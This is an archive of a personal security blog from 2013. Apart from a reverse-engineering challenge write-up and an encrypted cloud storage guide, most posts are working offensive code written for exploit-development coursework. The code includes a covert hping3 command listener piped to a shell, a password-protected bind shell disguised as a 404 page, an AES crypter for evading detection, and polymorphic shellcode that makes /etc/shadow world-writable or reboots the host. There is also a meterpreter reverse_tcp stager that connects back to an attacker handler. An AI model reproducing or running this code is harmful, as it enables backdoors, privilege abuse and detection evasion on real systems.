Late night thoughts on security: 2013

Friday, November 1, 2013

Create a hidden command listener by reusing an open port

Scenario:
- Box A - victim, running a network service on port 8834. We'll reuse this
- Box B - attacker host behind NAT. Will transmit commands to the listener waiting on the victim.

This is similar to a reverse shell from box A to box B, except that B will need another way to view results of the commands executed on A.

A:

$ sudo hping3 --listen SecretSignature -I vboxnet0 -p 8834 | /bin/sh

--listen - Listen mode. Waits for packets containing the signature and dump the data from signature to the end of the packet
-I - Interface to listen on
-p - listening port

This will intercept packets and dump the content after a matching signature. Commands will be passed to the shell to be executed. Another trick would be needed to view the output of the commands though.

B:

$ sudo hping3 --count 1 --data 200 --file commands.txt --sign SecretSignature 192.168.56.1 -V -p 8834

--count 1 - stop after sending 1 packet
--data 200 - set packet body size in bytes
--file - fill packet with data from file
--sign - fill first a signature in the packet
-V - verbose
-p - destination port

$ cat commands.txt
echo 123 > hacked.txt
whoami > log.txt
uname -a >> log.txt
pwd >> log.txt
ls -al >> log.txt
ifconfig -a >> log.txt

(New line at the end, to get the last command executed !)
Verify on victim's A machine that commands have been executed and results saved in the corresponding files.

Wednesday, August 7, 2013

Store encrypted files on Google Drive

We'll use the Grive Linux client for Google Drive and EncFS to create a 'safe' in the cloud, inside Google Drive and mount it locally:

1. Install Grive

sudo add-apt-repository ppa:nilarimogard/webupd8
sudo apt-get update
sudo apt-get install grive

2. How to use
Create a working folder :

mkdir ~/grive
cd ~/grive/

Initial setup will require an authorization token from Google. Paste the link generated by the following command into the browser, get the token and paste it into the application

grive -a

Synchronization of all the files in the cloud:

grive

3. Create an encrypted safe
For this I've used EncFS to create an encrypted filesystem inside the folder for the Google Drive:

apt-get install encfs
mkdir -p ~/grive/safe
mkdir -p ~/safe

Mount the encrypted safe to a decrypted folder (open the safe). If EncFS cannot find a filesystem at the specified location, it will create a new encrypted file system there.

encfs ~/grive/safe/ ~/safe/

I've used the paranoia mode for the initial setup - AES-256, PBKDF2, 160 bit salt, External IV Chaining (More details about the settings in the man page).
To verify that it was mounted correctly:

df -hT
encfs        fuse.encfs  455G  232G  200G  54% /home/liv/safe

Test the whole setup:

cd ~/safe/
echo "secret" > test.txt
cat test.txt
secret
ls ~/grive/safe/
pr6KT6wBszfvBqNLIo2pPliZ

Unmount the encrypted volume (close the safe):

sudo fusermount -u ~/safe

Notes
1. EncFS uses a file named .encfs6.xml to define the encrypted storage settings. This hidden file is not synchronized by Grive.
Solution: get a patched version of Grive or rename the file and store it on Google Drive.
After synchronizing Grive on another machine, rename the encfs6.xml file to .encfs6.xml.
2. Problem:
fusermount: failed to open /dev/fuse: Permission denied
Solution:
usermod -aG fuse
reboot

References
EncFS Encrypted Filesystem
Grive - Open source Linux client for Google Drive
Synchronise hidden files other than .grive*

Monday, August 5, 2013

Reverse Engineering challenge - Coursera Malicious Software course (anti-ptrace)

Malicious Software course, from Coursera, presented ways of malware to avoid detection and being reverse engineered, and also methods to detect and analyse them. Very interesting, especially the bonus challenge which is a small Linux binary, with some obfuscations protecting a secret.
Now that the course has finished, I can safely share the solution for the Reverse Engineering bonus challenge.

Overview

The binary has all symbols stripped out and also has some basic anti-debugging techniques in place.

$ file bonus_reverse-challenge
bonus_reverse-challenge: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2fe5f1647532449ffeef36a7fa31ae8319c8818d, stripped

The strings command reveals some interesting stuff:

$ strings bonus_reverse-challenge
. . .
socket
fflush
exit
htons
connect
puts
printf
mkstemp
read
stdout
inet_addr
close
sleep
write
/tmp
/bti
... 
xKZl_^_XCY^CIE
woot!
127.0.0.1
Dude, no debugging ;-)
Are you feeling lucky today?
[+] WooT!: %s
[~] Maybe.
[-] Nope.

Some socket operations and file manipulation. Also an ASCII string with some XOR characters (^) in it (hint ?!). Interesting. We can brute force it quickly to see if we get something meaningful out of it:

enc = "xKZl_^_XCY^CIE"
for key in range(0, 127):
    print "".join([chr(ord(c)^key) for c in enc])

$ ./decr.py
. . .
RapFuturistico

Analysis

If we start the application, we get a prompt and no hints about what to do next:

$ ./bonus_reverse-challenge
Are you feeling lucky today?

(The 'Yes' answer is not accepted by the application :) )
If we try to analyse it in gdb, we encounter another error:

$ gdb ./bonus_reverse-challenge 
Reading symbols from /home/liv/buffer/coursera/Malicious software/Week3/bonus-challenge/bonus_reverse-challenge...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/liv/buffer/coursera/Malicious software/Week3/bonus-challenge/bonus_reverse-challenge 
Dude, no debugging ;-)

If we use the strace tool (same technique also used by gdb) we see exactly what happens:

$ strace ./bonus_reverse-challenge
. . .
ptrace(PTRACE_TRACEME, 3215099972, 0xbfa287d4, 0) = -1 EPERM (Operation not permitted)
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb76fa000
write(1, "Dude, no debugging ;-)\n", 23Dude, no debugging ;-)

So the process tries to allow tracing, but as it is already traced (by strace) the ptrace system call returns -1.
This is a classic anti-debugging technique which can by bypassed in multiple ways.

Reverse engineering

First we have to get rid of the anti-ptrace protection. If we set a breakpoint in gdb at __libc_start_main and we step through some instructions, we find the code responsible for the ptrace system call:

EBX:  0x00000000 ; Type of request. 0 means PTRACE_TRACEME
=>    0x8048938: mov al,0x1a ; sys_ptrace syscall
      0x804893a: int 0x80    ; interrupt to execute syscall

I chose to do a binary patching at this point, as there are only a few instructions which have to be removed to get rid of the ptrace syscall. In assembly the instructions look like this:

 8048938:    b0 1a                    mov al, 0x1a
 804893a:    cd 80                    int 0x80

We can get the dump of the whole file with

$ objdump -M intel -d bonus_reverse-challenge

We'll overwrite them with nops:

set *(unsigned long*)0x8048938 = 0x90909090

After some more browsing we find the code responsible with parsing the input from the user. It seems to be a case which calls a function then displays a message based on the first letter of the input string. And there are 3 possibilities:

   0x8048a18:    movzx  eax,BYTE PTR [esp+0x20] ; input string
   0x8048a1d:    movsx  eax,al              ; first letter !
   0x8048a20:    cmp    eax,0x42
   0x8048a23:    je     0x8048a3c
   0x8048a25:    cmp    eax,0x43
   0x8048a28:    je     0x8048a49
   0x8048a2a:    cmp    eax,0x41
   0x8048a2d:    jne    0x8048a56
   0x8048a2f:    mov    DWORD PTR [esp+0x22c],0x804872b ; check function for A..
   0x8048a3a:    jmp    0x8048a58
   0x8048a3c:    mov    DWORD PTR [esp+0x22c],0x8048644 ; check function for B..
   0x8048a47:    jmp    0x8048a58
   0x8048a49:    mov    DWORD PTR [esp+0x22c],0x80486ca ; check function for C..
   0x8048a54:    jmp    0x8048a58

We test this manually:

$ ./bonus_reverse-challenge
Are you feeling lucky today? A
[~] Maybe.
$ ./bonus_reverse-challenge
Are you feeling lucky today? B
[-] Nope.
$ ./bonus_reverse-challenge
Are you feeling lucky today? C
[~] Maybe.

If we were to believe the developer, we should go for Asomething or Csomething and further analyse.
Let's try Bsomething variant (A... is interesting for analyses also but doesn't get us to the key)
We quickly find references to the encrypted string found initially and a comparing routine, which computes a key and applies XOR to the input string using that key:

   0x8048664:    mov    DWORD PTR [ebp-0x10],0xfa ; key
   0x804866b:    pop    eax                       ; input string address
   0x804866c:    jmp    0x8048685
   0x804866e:    mov    eax,DWORD PTR [ebp-0xc]   ; first char of input string
   0x8048671:    movzx  eax,BYTE PTR [eax]
   0x8048674:    mov    edx,DWORD PTR [ebp-0x10]
   0x8048677:    and    edx,0x2b                  ;  key becomes 0x2A
   0x804867a:    xor    edx,eax
   0x804867c:    mov    eax,DWORD PTR [ebp-0xc]
   0x804867f:    mov    BYTE PTR [eax],dl
   0x8048681:    add    DWORD PTR [ebp-0xc],0x1
   0x8048685:    mov    eax,DWORD PTR [ebp-0xc]
   0x8048688:    movzx  eax,BYTE PTR [eax]
   0x804868b:    test   al,al
   0x804868d:    jne    0x804866e                  ; loop
   0x804868f:    mov    eax,DWORD PTR [ebp+0x8]
   0x8048692:    mov    edx,eax
   0x8048694:    mov    eax,0x8048bc0              ; "xKZl_^_XCY^CIE"
   0x8048699:    mov    ecx,0xf 
   0x804869e:    mov    esi,edx
   0x80486a0:    mov    edi,eax
   0x80486a2:    repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]

E(M, K) = "xKZl_^_XCY^CIE"
Where:
  E - XOR encoding
  M - Input message after 'B' character
  K - Computed key: 0xFA && 0x2B = 0x2A

We reverse the algorithm and get the input message we need:

$ python -c 'print "".join([chr(ord(c)^0x2a) for c in "xKZl_^_XCY^CIE"])'
RapFuturistico

So if the input string encodes to the string we found initially, the function returns 1 and we get a nice message:

$ ./bonus_reverse-challenge
Are you feeling lucky today? BRapFuturistico
[+] WooT!: xKZl_^_XCY^CIE

Nice! Many thanks to the authors for putting together the course and the challenge.

References

Linux Anti-Debugging
Linux Syscall reference
Executable patching with GDB

Sunday, August 4, 2013

Bind TCP Shellcode - with password

As with the bind TCP shellcode, I've first started with a small C program to do this and analysed the system calls. The following program listens for incoming connections, prints a prompt message, reads some input and spawns a new shell if the input is equal to the password:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>

/* receiving password buffer size */
#define     BUFSIZE      10

/* Listening port */
#define     PORT         8585

/* Password prompt */
char prompt[] =  \
    "<html>\n"
    "<body>\n"
    " <h1>Error 404 - Try elsewhere</h1>\n"
    "\n" 
    "</body>\n"
    "</html>\n";

char password[] = "s3cr37";

int main() {
    int listenfd = 0, connfd = 0;    
    int ret = 0;
    char buffer[BUFSIZE];

    struct sockaddr_in serv_addr;

    // Create an un-named socket. returns socket descriptor
    listenfd = socket(AF_INET, SOCK_STREAM, 0);

    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);

    bind(listenfd, (struct sockaddr*) &serv_addr, sizeof(serv_addr));

    // Listen on the created socket for maximum 1 client connection
    listen(listenfd, 1);

    // Sleep waiting for client requests
    connfd = accept(listenfd, (struct sockaddr*) NULL, NULL);
    printf("Created accept socket: %d\n", connfd);

    // Send fake prompt and wait for the password
    ret = send(connfd, prompt, strlen(prompt), 0); 
    if (-1 == ret) {
        printf("Send failed: %s\n", strerror(errno));
        return 1;
    }

    // Read password
    ret = recv(connfd, buffer, BUFSIZE, 0);
    if (-1 == ret) {
        printf("Recv failed: %s\n", strerror(errno));
        return 1;
    } else {
        printf("Received: %s", buffer);
    }

    // Compare
    if (!strncmp(buffer, password, strlen(password))){
        printf("Correct password. Opening shell...\n");    
    } else {
        close(listenfd);
        close(connfd);
        return 1;
    }

    // Duplicate stdin, stdout, stderr
    ret = dup2(connfd, 0);
    if (-1 == ret) {
        printf("STDIN duplication failed: %s\n", strerror(errno));
        return 1;
    }

    ret = dup2(connfd, 1);
    if (-1 == ret) {
        printf("STDOUT duplication failed: %s\n", strerror(errno));
        return 1;
    }

    ret = dup2(connfd, 2);
    if (-1 == ret) {
        printf("STDERR duplication failed: %s\n", strerror(errno));
        return 1;
    }

    // Replace process image
    char *args[2];
    args[0] = "/bin/sh";
    args[1] = NULL;      // Needs to ne a NULL terminated list of args

    ret = execve(args[0], args, NULL);
    if (-1 == ret) {
        printf("Execve failed: %s\n", strerror(errno));
        return 1;
    }

    return 0;
}

If we supply the correct password we get the shell:

$ gcc -Wall shell_bind_tcp.c -o shell_bind_tcp
$ ./shell_bind_tcp_passw  &
[1] 4528
Created accept socket: 5
Received: s3cr37
Ź� Correct password. Opening shell...
$ nc -nvv 192.168.56.1 8585
(UNKNOWN) [192.168.56.1] 8585 (?) open



Error 404 - Try elsewhere


s3cr37
whoami
liv

The next step is to reproduce these system calls in assembly and get the shellcode. This is easy to do, if we start from the previous TCP bind shellcode and add a recv call and compare input:

global _start   

section .text
_start:

    ; Linux Syscall Reference
    ; http://syscalls.kernelgrok.com/


    ; 1. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = listenfd
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    push ecx        ; NULL terminate args list
    mov cl, 6       ; IPPROTO_TCP (6)
    push ecx
    xor ecx, ecx
    mov cl, 1       ; SOCK_STREAM (1) - in socket.h
    push ecx
    xor ecx, ecx
    mov cl, 2       ; PF_INET (2) - IP PROTO FAMILY
    push ecx
    mov ecx, esp    ; socketcall arguments
    xor ebx, ebx
    mov bl, 1       ; socketcall type of call: SYS_SOCKET (1) 
    push 102
    pop eax         ; socketcall syscall
    int 0x80
    mov edx, eax    ; listenfd is returned in eax. Save into edx    

    ; 2. bind(listenfd, {sa_family=AF_INET, sin_port=htons(4444), \
    ;       sin_addr=inet_addr("0.0.0.0")}, 16)
    ;struct sockaddr_in {
    ;    short            sin_family;   // e.g. AF_INET, AF_INET6
    ;    unsigned short   sin_port;     // e.g. htons(3490)
    ;    struct in_addr   sin_addr;     // see struct in_addr, below
    ;    char             sin_zero[8];  // zero this if you want to
    ;};
    ;struct in_addr {
    ;    unsigned long s_addr;          // load with inet_pton()
    ;};
    xor ecx, ecx    ; Construct sockaddr structure on the stack
    push ecx        ; inet_addr - 0.0.0.0 - INADDR_ANY
    push word 0x8921; 16 bits - port number (8585 decimal)
    push word 2     ; family - AF_INET (2)
    mov ecx, esp    ; pointer to args

    push byte 0x10  ; Address length - 16 bytes
    push ecx        ; Pointer to sockaddr_in structure
    push edx        ; listenfd from socket call

    mov ecx, esp    ; socketcall arguments
    xor ebx, ebx
    mov bl, 2       ; socketcall type of call: SYS_BIND (2)
    xor eax, eax
    mov al, 102     ; socketcall syscall
    int 0x80

    ; 3. listen(listenfd, 1)
    push 1          ; max connections
    push edx        ; listenfd
    mov ecx, esp    ; pointer to socketcall arguments
    push 4
    pop ebx         ; SYS_LISTEN (4)
    push 102
    pop eax         ; socketcall syscall
    int 0x80
 
    ; 4. accept(listenfd, 0, NULL) = connfd
    xor ecx, ecx
    push ecx        ; NULL
    push ecx        ; 0
    push edx        ; listenfd
    mov ecx, esp    ; pointer to socketcall arguments
    push 5
    pop ebx         ; SYS_ACCEPT = 5
    push 102
    pop eax         ; socketcall syscall
    int 0x80        ; connfd will be in eax
    mov edx, eax    ; save new connection descriptor

    ; 5. recv(connfd, buffer, BUFSIZE, 0)
    ; recv(int sockfd, void *buf, size_t len, int flags);
    xor ecx, ecx    
    push   ecx      ; flags (0)
    push   0xa      ; buffer size
    lea    ecx, [esp + 8]
    push   ecx      ; addres of buffer
    mov edi, ecx    ; save address of buffer for further comparison
    push   edx      ; sockfd
    mov    ecx, esp ; ECX - params of socket call    
    push 10
    pop ebx         ; EBX - type of socketcall - SYS_RECV (10)
    push 102
    pop eax         ; socketcall syscall
    int 0x80        ; connfd will be in eax


    ; 6. compare password
 mov ecx, 6      ; passwd len
    ; pass: s3cr37 - 73 33 63 72 33 37 
    push 0xAAAA3733
    push 0x72633373
 mov esi, esp
    ; address of buffer is already saved in edi
 repe cmpsb
 jz correct_pass
    
    ; exit()
    xor eax, eax
 mov al, 1
 xor ebx, ebx
    mov bl, 7
 int 0x80

correct_pass:
    ; 7. dup2(connfd, 2), dup2(connfd, 1), dup2(connfd, 0)
    push 2
    pop ecx         ; ecx - newfd
    mov ebx, edx    ; edx - connfd, ebx - oldfd
    dup_loop:
    mov al, 63      ; dup2 syscall
    int 0x80
    dec ecx
    jns dup_loop    ; exit when signed (-1)
      
    ; 8. execve("/bin/sh", ["/bin/sh"], [/* 0 vars */])
 ; PUSH the first null dword 
 xor eax, eax
 push eax

    ; PUSH //bin/sh (8 bytes) 
 push 0x68732f2f ; 'hs//'
 push 0x6e69622f ; 'nib/
 mov ebx, esp    ; EBX - 1st param - NULL terminated filename

 push eax        ; EDX - 3rd param - NULL terminated list of env variables
 mov edx, esp    ; NULL terminator must be set before setting the 2nd param!

 push ebx        ; ECX - 2nd param - array of argument strings
 mov ecx, esp

 mov al, 11      ; execve syscall
 int 0x80

The complete source files, wrapper script and test shellcode can be found in a git repository at:
SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE- 449

AES Shellcode crypter

This is the last assignment of SLAE: building a shellcode crypter. Thanks Vivek and the team at SecurityTube for the course!

I chose to do the encryption using python-crypto library. I used AES-128, in CBC mode with PKCS5 padding
I did the decryption of the shellcode using the easily integrable PolarSSL AES source code

The encryption password is provided on the command line, then the python script hard-codes it in the decrypter and builds it. For exemplify I've used the execve-stack shellcode:

$ ./encrypt_payload_polar.py 
Usage:
    ./encrypt_payload_polar.py [passphrase]
    
$ ./encrypt_payload_polar.py s3cr37
[+] Shellcode (len 32):
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
[+] Key:
"\xe8\xca\xa8\xd3\x69\x22\xbe\x22\xf3\x2e\x08\x30\x11\xc0\xef\xbc"
[+] IV:
"\x07\xb0\x24\x02\x5b\x00\x68\xfc\x34\x30\x5e\x42\x64\x24\x39\x99"
[+] Encrypted shellcode (len 134): 
"\x0d\x18\x30\xe5\xca\x14\x13\x3d\x5e\xb2\xfa\xeb\x60\x1d\x51\x9b"
"\x24\x74\x64\xd7\x17\x9f\x32\xdf\xbf\x36\xf4\x91\x9c\x03\x09\xfb"
[+] Compiling:
 -> gcc -Wall -z execstack -o encrypted_shellcode temp.c PolarSSL/aes.c PolarSSL/md5.c
 -> strip --strip-all encrypted_shellcode
 -> rm temp.c
[*] Done.
$ ./encrypted_shellcode 
#

The encrypter/decrypter uses the password to generate a 128 bits key, by hashing the password.
The PolarSSL is extremely easy to integrate and use, compared with the OpenSSL, and the generated binary is also much smaller as only AES and MD5 functions are linked in. Here's a snippet of the decrypter code that does the main bits:

    unsigned char key[16];
    unsigned char iv[16] = 
"\xb4\x9d\x64\x10\xa8\x3b\x1b\xa9\x29\xc4\x4b\x09\xfe\x2c\xd3\x56";

    unsigned char input[] = 
"\x24\x06\xa6\xe4\x5d\xc4\xc0\x0e\x36\x7d\x05\x5a\xfe\xc1\x07\x0c"
"\x31\x48\xef\x06\x0f\x09\x84\x98\x03\x3e\x04\x1e\x08\x6d\xb2\xe3";
    size_t input_len = 32;
    unsigned char output[32];

    unsigned char passw[] = "s3cr37";
    size_t in_len = 6;

    /* Generate a 128 bits key from the password */
    md5_context md5_ctx;
    md5_starts(&md5_ctx);
    md5_update(&md5_ctx, passw, in_len);
    md5_finish(&md5_ctx, key);

    /* Decrypt the payload */
    aes_context aes;
    aes_setkey_dec(&aes, key, 128);
    aes_crypt_cbc(&aes, AES_DECRYPT, input_len, iv, input, output);

    /* Execute decrypted shellcode */
    ((void (*)()) output)();

The python script uses a template of the decrypter and fills in the encrypted shellcode, the lengths, IV and key and then generates the encrypted binary. Below is a snippet of the main function:

def make_binary(password):
    sc_len = len(pad(shellcode))
    print_done("[+] Shellcode (len %d):" % (sc_len))
    print "%s" % (to_hex(shellcode))

    # Generate a secret key and random IV
    h = MD5.new()

    h.update(password)
    key = h.digest()
    str_key = to_hex(key)
    print_done("[+] Key:")
    print "%s" % str_key

    # Generate random IV
    iv = os.urandom(BS)
    str_iv = to_hex(iv) #"\"%s\"" % "".join(["\\x%02x" % ord(c) for c in iv])
    print_done("[+] IV:")
    print "%s" % str_iv

    # Create a cipher object using the random secret
    cipher = AES.new(key, AES.MODE_CBC, iv)

    enc = cipher.encrypt(pad(shellcode))
    str_enc = to_hex(enc)
    print_done("[+] Encrypted shellcode (len %d):" % (len(str_enc)))
    print "%s" % (str_enc)

    outline = open(decrypt_shell).read()
    code = outline % (str_iv, str_enc, sc_len, sc_len, password, len(password))

    # Write to temporary source file
    o = open(temp_src, "w")
    o.write(code)
    o.close()

    # Compile
    compile_cmd = "gcc -Wall -z execstack -o %s %s PolarSSL/aes.c PolarSSL/md5.c" % \
       (out_file, temp_src)
    print_done("[+] Compiling:") 
    print " -> %s" % compile_cmd
    os.system(compile_cmd)


    # Strip all symbols
    strip_cmd = "strip --strip-all %s" % (out_file)
    print " -> %s" % (strip_cmd)
    os.system(strip_cmd)

    # Delete intermediate files
    clean_cmd = "rm %s" % (temp_src)
    print " -> %s" % (clean_cmd)
    os.system(clean_cmd)

    print_ok("\n[*] Done. Run ./%s" % (out_file))

The complete source files and scripts mentioned in this post can be found in the Git repository:
SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE- 449

Polymorphic shellcodes

For this assignment I've taken 3 shellcodes from Shell-Storm and modify them to avoid pattern matching. Some techniques I've used to do this:

Add garbage/nop-like instructions

nop

mov al,al  
mov bl,bl  
mov cl,cl  
...  
mov ax,ax  
mov bx,bx  
mov cx,cx  
...  
xchg ax,ax  
xchg bx,bx  
xchg cx,cx  
...  
lea eax, [eax + 0x00]  
lea eax, [eax + 0x00]  
lea eax, [eax + 0x00]

Add instructions without effect (e.g.: modify registers that don't affect the execution flow)
Switch between mov, (push + pop), (clear + add)

mov push + pop clear + add

mov al, 0xb push byte 0xb xor eax, eax

pop eax add al, 0xb
Switch between push and (mov + add + push)

push mov + add + push

push 0x23456789 mov esi, 0x12345678

add esi, 0x11111111

push esi
Change between push and directly accessing the stack

push stack access

push 0x64777373 mov dword [esp-4], 0x64777373

sub esp, 4

mov	push + pop	clear + add
mov al, 0xb	push byte 0xb	xor eax, eax
	pop eax	add al, 0xb

push	mov + add + push
push 0x23456789	mov esi, 0x12345678
	add esi, 0x11111111
	push esi

push	stack access
push 0x64777373	mov dword [esp-4], 0x64777373
	sub esp, 4

Execve()

First one is a polymorphic version of the execve() of the following shellcode:

    00000000  31C0              xor eax,eax
    00000002  31DB              xor ebx,ebx
    00000004  31C9              xor ecx,ecx
    00000006  B017              mov al,0x17
    00000008  CD80              int 0x80
    0000000A  31C0              xor eax,eax
    0000000C  50                push eax
    0000000D  686E2F7368        push dword 0x68732f6e
    00000012  682F2F6269        push dword 0x69622f2f
    00000017  89E3              mov ebx,esp
    00000019  8D542408          lea edx,[esp+0x8]
    0000001D  50                push eax
    0000001E  53                push ebx
    0000001F  8D0C24            lea ecx,[esp]
    00000022  B00B              mov al,0xb
    00000024  CD80              int 0x80
    00000026  31C0              xor eax,eax
    00000028  B001              mov al,0x1
    0000002A  CD80              int 0x80

And my changed version :

    xor eax,eax
    mov ebx, eax            ; xor ebx,ebx
    mov ecx, ebx            ; xor ecx,ecx
    push 0x17               ; mov al,0x17
    pop ax
    xchg ecx, ecx           ; NOP added
    int 0x80                ; sys_setuid()

    xor eax,eax
    push eax
    mov dword [esp-4], 0x68732f6e ; push dword 0x68732f6e
    mov dword [esp-8], 0x69622f2f ; push dword 0x69622f2f
    sub esp, 8             ; increase the stack pointer
    mov ebx,esp
    lea edx,[esp+0x8]
    push eax
    push ebx
    lea ecx,[esp]
    mov al,0xb
    xor esi, esi            ; NOP added
    lea eax, [eax + esi]    ; NOP added
    int 0x80                ; execve()

    xor eax,eax
    mov al,0x1
    int 0x80                ; exit()

I've changed how registers are zeroed and how values were pushed on the stack and added some instructions with no effect.

Chmod /etc/shadow

The next shellcode changes the permissions of /etc/shadow file:

xor    %eax,%eax
push   %eax
pushl  $0x776f6461
pushl  $0x68732f2f
pushl  $0x6374652f
movl   %esp,%esi
push   %eax
pushl  $0x37373730
movl   %esp,%ebp
push   %eax
pushl  $0x646f6d68
pushl  $0x632f6e69
pushl  $0x622f2f2f
mov    %esp,%ebx
pushl  %eax
pushl  %esi
pushl  %ebp
pushl  %ebx
movl   %esp,%ecx
mov    %eax,%edx
mov    $0xb,%al
int    $0x80

And my changed version:

    xor eax,eax
    push eax
    push dword 0x776f6461
    mov esi, 0x56611d1d         ; push dword 0x68732f2f
    lea edi, [esi]              ; junk
    add esi, 0x12121212
    push esi
    push dword 0x6374652f       ; '/etc/shadow'
    mov esi,esp
    push eax
    push dword 0x37373730       ; 0777
    mov ebp,esp
    push eax
    push dword 0x646f6d68
    mov edi, 0x030f0e09         ; push dword 0x632f6e69       
    add edi, 0x60206060
    push edi
    push word 0x622f            ; /bin/chmod
    mov ebx,esp
    push eax
    push esi
    push ebp
    push ebx
    mov ecx,esp
    mov edx,eax
    xor eax, eax                ; mov al,0xb
    add al, 0xa
    add al, 0x1
    xchg ecx, ecx               ; NOP added
    int 0x80

Reboot

Last one is a reboot shellcode:

8048054:       31 c0                   xor    %eax,%eax
8048056:       50                      push   %eax
8048057:       68 62 6f 6f 74          push   $0x746f6f62
804805c:       68 6e 2f 72 65          push   $0x65722f6e
8048061:       68 2f 73 62 69          push   $0x6962732f
8048066:       89 e3                   mov    %esp,%ebx
8048068:       50                      push   %eax
8048069:       89 e2                   mov    %esp,%edx
804806b:       53                      push   %ebx
804806c:       89 e1                   mov    %esp,%ecx
804806e:       b0 0b                   mov    $0xb,%al
8048070:       cd 80                   int    $0x80

And my modified version:

    xor eax,eax
    push eax
    push dword 0x746f6f62
    mov edi, 0x05020f0e      ; push dword 0x65722f6e
    add edi,0x60702060
    push edi
    push dword 0x6962732f    ; /sbin/reboot
    mov ebx,esp
    push eax
    mov edx,esp
    push ebx
    mov ecx,esp
    push 0xa
    pop eax
    add al, 1                ; mov al,0xb
    int 0x80

Metasploit Linux meterpreter/reverse_tcp shellcode

This post is part of the 5th assignment of the SLAE course and will analyse another Metasploit shellcode: meterpreter/reverse_tcp.
First we'll check the description of this shellcode:

# msfpayload linux/x86/meterpreter/reverse_tcp S

       Name: Linux Meterpreter, Reverse TCP Stager
     Module: payload/linux/x86/meterpreter/reverse_tcp
    Version: 0
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 178
       Rank: Normal

Provided by:
  PKS
  egypt <egypt@metasploit.com>
  skape <mmiller@hick.org>

Basic options:
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
DebugOptions  0                no        Debugging options for POSIX meterpreter
LHOST                          yes       The listen address
LPORT         4444             yes       The listen port
PrependFork                    no        Add a fork() / exit_group() (for parent) code

Description:
  Connect back to the attacker, Staged meterpreter server

To test it, we'll insert the 1st stage payload into the skeleton tester file:

# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 C
/*
 * linux/x86/meterpreter/reverse_tcp - 71 bytes (stage 1)
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.56.101, LPORT=4444, 
 * ReverseConnectRetries=5, ReverseAllowProxy=false, 
 * EnableStageEncoding=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, AutoLoadStdapi=true, 
 * InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true, 
 * EnableUnicodeEncoding=true, PrependFork=false, 
 * DebugOptions=0
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68\xc0\xa8\x38\x65\x68\x02\x00\x11\x5c\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1";

/*
 * linux/x86/meterpreter/reverse_tcp - 1126400 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] = 
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x02\x00\x03\x00\x01\x00\x00\x00\x05\xfe\x04\x20\x34\x00"
. . .

We don't care about the 2nd stage because it will be transmitted to the client after connection. Then start a multi handler which will receive the connection and send the 2nd stage payload:

msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         192.168.56.101   yes       The listen address
   LPORT         4444             yes       The listen port

msf exploit(handler) > exploit -j -z

We send the compiled stage 1:

$ ./shellcode
Shellcode Length:  24 bytes
(Shellcode contains null bytes)

And we get in the handler:

msf exploit(handler) > 
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.1:33626) at 2013-07-21 21:21:08 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000

So the shellcode is working as expected. We proceed to analyse the payload with the shellcode tester from libemu:

# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 R > shellcode.bin
# ls -al shellcode.bin 
-rwxrwx--- 1 root vboxsf 71 Jul 21 21:25 shellcode.bin
(71 bytes. It's stage 1)
$ cat shellcode.bin | /opt/libemu/bin/sctest -vvv -S -s 1000 -G shellcode.dot

And there's the first part of the shellcode that it was possible to be decoded by the emulator:

int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
